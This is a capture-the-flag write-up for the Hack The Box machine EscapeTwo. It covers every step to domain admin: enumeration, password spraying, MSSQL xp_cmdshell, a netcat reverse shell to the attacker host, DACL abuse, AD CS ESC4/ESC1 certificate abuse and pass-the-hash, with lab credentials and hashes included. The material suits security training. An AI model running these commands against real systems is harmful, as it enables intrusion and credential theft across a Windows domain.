Owned EscapeTwo from Hack The Box!
I have just owned machine EscapeTwo from Hack The Box
Hack The Box
Nmap Results
# Nmap 7.95 scan initiated Sat Jan 11 23:44:29 2025 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.172.198
Nmap scan report for 10.129.172.198
Host is up (0.018s latency).
Not shown: 65511 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-12 04:45:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-12T04:47:19+00:00; +2s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-12T04:47:19+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-12T04:38:10
|_Not valid after: 2055-01-12T04:38:10
| ms-sql-ntlm-info:
| 10.129.172.198:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.129.172.198:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2025-01-12T04:47:19+00:00; +2s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-12T04:47:19+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-12T04:47:19+00:00; +2s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49689/tcp open msrpc Microsoft Windows RPC
49718/tcp open msrpc Microsoft Windows RPC
49737/tcp open msrpc Microsoft Windows RPC
56637/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-12T04:46:43
|_ start_date: N/A
|_clock-skew: mean: 2s, deviation: 0s, median: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 11 23:47:17 2025 -- 1 IP address (1 host up) scanned in 168.60 seconds💡
Don't miss an opportunity to find some breadcrumbs and interesting information in the initial
nmap scan output, as we can see the hostname of DC01.sequel.htb in the output from several ports. Let's get that added to our /etc/hosts file.echo -e '10.129.185.52\t\tDC01.sequel.htb sequel.htb' | sudo tee -a /etc/hostsService Enumeration
TCP/445
💡
We are provided credentials, emulating an assumed breach scenario, allowing us to enumerate a good deal of information about the domain even at a low level of access.
smbclient -U 'sequel.htb\rose%KxEPkKe6R8su' -L //DC01.sequel.htb
smbclient -U 'sequel.htb\rose%KxEPkKe6R8su' '//DC01.sequel.htb/Accounting Department'
💡
The
.xlsx files were not playing well with LibreOffice, so I just searched Google for an online .xlsx viewer and this one worked great. Obviously, don't do this if you're having trouble viewing files with real sensitive data.
ℹ️
I'm just going to grab the list of passwords here and disregard the usernames, as I can just pull those from AD. Then, I'll use the password list with the usernames from AD.
TCP/389
LdapDomainDump
ℹ️
I like to run
ldapdomaindump to get a first look at the domain users, computers, and groups, which then helps me identify some potential places to look in the BloodHound data.ldapdomaindump -u 'sequel.htb\rose' -p 'KxEPkKe6R8su' -o ldd ldap://DC01.sequel.htbopen ldd/domain_users_by_group.html
ca_svc account may open some avenues for AD CS exploits if we can pivot to this user
sql_svc is a configured with a ServicePrincipalName and may be Kerberoastable
Remtote BloodHound
bloodhound-python -c All -u 'rose' -p 'KxEPkKe6R8su' -d 'sequel.htb' -ns '10.129.185.52'
.json files into BloodHound for analysis
_svc accounts as being Kerberoastable, so worth checking if we can crack a hash and pivot from thereCredential Spraying
cat ldd/domain_users.grep | cut -f 3 | grep -vE 'rose|sAMA' > users.txtFilter the column header from the output and we already know rose password
nxc smb DC01.sequel.htb -d sequel.htb -u users.txt -p pw.txt --continue-on-success
oscar💡
From here, we should look to BloodHound for how we might pivot now that we've owned Oscar's account
rose is that oscar is a member of the Accounting Department group⚠️
Nothing too interesting when pivoting from Oscar either. The Accounting Department group doesn't appear to offer any additional permissions either. However, there was clearly a MSSQL database password in the
accounts.xlsx file and tcp/1433 is open on the domain controller.TCP/1433
impacket-mssqlclient 'SEQUEL.HTB/sa:MSSQLP@ssw0rd!'@10.129.185.52
💡
Operating as
sa on the DBMS makes us the database administrator, meaning that we should be able to enable xp_cmdshell.SQL (sa dbo@master)> enable_xp_cmdshell
ipconfig via xp_cmdshellExploit
Privilege Credential in SMB Share
Even with low-level access as rose, being able to access the Accounting Department share and discover the accounts.txt file allowed us to acquire yet more credentials for testing additional access levels.
Access as oscar was not fruitful, but with tcp/1433 being open on externally and having the sa credential for the database allows us to easily achieve command execution via the enable_xp_cmdshell helper in Impacket's smbclient script.
Host nc.exe over SMB
cp /usr/share/windows-resources/binaries/nc.exe .Copy nc.exe to the working directory
sudo impacket-smbserver -smb2support -username evil -password evil evilshare .Host nc.exe over SMB
sudo rlwrap nc -lnvp 443Start a TCP listener to catch a reverse shell
SMB | 0xBEN | Notes
SMB Server on Attack Box
For this, we can use Impacket’s smbserver.py script to run an ad-hoc SMB s…
Steps to map the SMB share using a username and password (as required by modern versions of Windows)
SQL (sa dbo@master)> xp_cmdshell net use Z: \\10.10.14.38\evilshare /user:evil evilMap the share to the Z: volume
SQL (sa dbo@master)> xp_cmdshell Z:\nc.exe 10.10.14.38 443 -e powershell.exeMap the share to the Z: volume
Post-Exploit Enumeration
Operating Environment
OS & Kernel
Host Name: DC01
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA352
Original Install Date: 6/8/2024, 9:32:20 AM
System Boot Time: 1/13/2025, 12:25:25 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version: VMware, Inc. VMW71.00V.23553139.B64.2403260936, 3/26/2024
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume3
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,573 MB
Virtual Memory: Max Size: 5,503 MB
Virtual Memory: Available: 3,855 MB
Virtual Memory: In Use: 1,648 MB
Page File Location(s): C:\pagefile.sys
Domain: sequel.htb
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.185.52
Current User
USER INFORMATION
----------------
User Name SID
============== ============================================
sequel\sql_svc S-1-5-21-548670397-972687484-3496335370-1122
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ =============================================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
SEQUEL\SQLServer2005SQLBrowserUser$DC01 Alias S-1-5-21-548670397-972687484-3496335370-1128 Mandatory group, Enabled by default, Enabled group, Local Group
SEQUEL\SQLRUserGroupSQLEXPRESS Alias S-1-5-21-548670397-972687484-3496335370-1129 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Users and Groups
Already documented during pre-exploit enumeration of LDAP.
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.185.52
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
Interesting Files
C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
Privilege Escalation
Password Reuse
💡
A huge part of my methodology is checking the configuration files for the service that got me my reverse shell. In this case, since MSSQL was the attack vector to a reverse shell, I went and looked at the configuration for this service --
I added the password to my existing list
C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI -- and noted a password for the sql_svc account.I added the password to my existing list
pw.txt and sprayed the credentials using nxc again to see if anything new came of it.
nxc smb DC01.sequel.htb -d 'sequel.htb' -u users.txt -p pw.txt --continue-on-success | grep '+'
Lateral to Ryan
evil-winrm -i DC01.sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3'
💡
Doing some enumeration from WinRM, I'm not seeing anything too significant. However, since we now have a credential for
ryan, we can consider the account pwned, which would make this a good time to revisit BloodHound.
WriteOwner DACL to abuse on CA_SVC, which almost certainly smells like AD CS
Abusing WriteOwner
💡
Since we already have a WinRM session as
ryan, we'll use a mix of both Linux and Windows commands to carry out the attack, make us the owner of the ca_svc account, and change the account password to pivot to this user.impacket-owneredit -action write -new-owner 'ryan' -target 'ca_svc' -dc-ip '10.129.185.52' 'SEQUEL.HTB/ryan:WqSZAF6CysDQbGb3' 2>/dev/null
impacket-dacledit -action write -rights 'FullControl' -principal 'ryan' -target 'ca_svc' -dc-ip '10.129.185.52' 'SEQUEL.HTB/ryan:WqSZAF6CysDQbGb3' 2>/dev/null
GenericAll over the ca_svc user, allowing us to set the password❗
Act quickly, as there is a scheduled task that resets the changes
net user ca_svc 'P@$$word123!' /domainTo be run on the Windows box via your WinRM session
Lateral to CA_SVC
Enumerating AD CS Vulnerabilities
💡
That this user is name
ca_svc is no coincidence, we're certainly meant to enumerate this as a privilege escalation path.certipy-ad find -u 'ca_svc' -p 'P@$$word123!' -dc-ip '10.129.185.52' -vulnerableIt goes without saying, but use the password you set on the account
Abusing ESC4
To summarize the ESC4 privilege escalation path:
- The
ca_svcaccount has permission to overwrite theDunderMifflinAuthenticationtemplate, as the user is a member of theCert Publishersgroup - Being able to overwrite this template means we can change the configuration to make it vulnerable to
ESC1 - Now being vulnerable to
ESC1, we can set an arbitrary SAN and use the certificate to authenticate as an administrative user
GitHub - arth0sz/Practice-AD-CS-Domain-Escalation: Introductory guide on the configuration and subsequent exploitation of Active Directory Certificate Services with Certipy. Based on the white paper Certified Pre-Owned.
Introductory guide on the configuration and subsequent exploitation of Active Directory Certificate Services with Certipy. Based on the white paper Certified Pre-Owned. - arth0sz/Practice-AD-CS-Dom…
arth0sz
❗
As stated before, if you run into permissions issues, go back and run the
impacket-owneredit and impacket-dacledit commands and reset the password, due to the scheduled task reverting the changes.certipy-ad template -u 'ca_svc' -p 'P@$$word123!' -dc-ip '10.129.185.52' -template 'DunderMifflinAuthentication' -save-old
certipy-ad req -u 'ca_svc' -p 'P@$$word123!' -dc-ip '10.129.185.52' -template 'DunderMifflinAuthentication' -upn 'Administrator@sequel.htb' -ca 'sequel-DC01-CA'
certipy-ad auth -pfx administrator.pfx -domain 'SEQUEL.HTB'
✅
In the output is the NT hash for the domain admin. All that's left is to pass the hash and own the domain controller.
Becoming Domain Admin
Pass the NT Hash
Evil-WinRM
evil-winrm -i DC01.sequel.htb -u Administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff
impacket-psexec
impacket-psexec -hashes ':7a8d4e04986afa8ed4060f75e5a0b3ff' 'SEQUEL.HTB/Administrator'@10.129.185.52 'powershell.exe'
Flags
User
97490e6d51de3087f000defc13ae94e1
Root
37202fd89d2c4f52170d9ed159081035
